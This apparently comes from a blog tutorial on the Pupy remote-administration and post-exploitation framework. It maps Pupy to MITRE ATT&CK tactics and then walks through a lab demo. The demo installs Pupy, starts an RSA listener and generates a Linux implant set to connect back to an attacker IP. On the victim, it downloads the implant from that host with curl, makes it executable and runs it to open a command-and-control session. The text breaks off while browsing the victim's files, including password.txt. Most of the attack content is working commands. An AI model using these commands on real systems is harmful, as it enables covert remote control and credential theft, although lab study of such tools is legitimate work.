[Offensive Security] Command and Control with Pupy!!
--
What is Pupy?
Pupy is an open-source remote admin and post-exploitation tool written in python. Pupy executes in memory, allowing it to leave a low footprint. Pupy also offers multiple communications channel options to make traffic.
MITRE ATT&CK
- initial access
- execution
- persistence
- privillege escalation
- defense evasion
- credential access
- discovery
- lateral movement
- collection
- command & control
- exfilltration
- impact
DEMO
Installation
To install pupy execute the following commands one by one :
git clone https://github.com/n1nj4sec/pupy
Now download all the requirements using pip like the following command :
cd pupy
pip install -r requirements.txt
Now run pupy using the following command :
./pupysh.py
Establish a new session
Pupy Server: Main Terminal
config list
- This command shows all configurations, including the [listeners].
listen -a rsa
gen --output output/linux.ln --output-dir /project --debug -f client -O linux -A x64 connect --host 172.31.24.230:9091 -t rsa
Victim — Linux
curl --output $HOME/linux.ln http://172.31.24.230:8080/linux.ln
chmod +x $HOME/linux.ln
./linux.ln
After 60 seconds, the implant should connect to the Pupy server.
Pupy Server: Main Terminal
ls
- Notice the password.txt within the…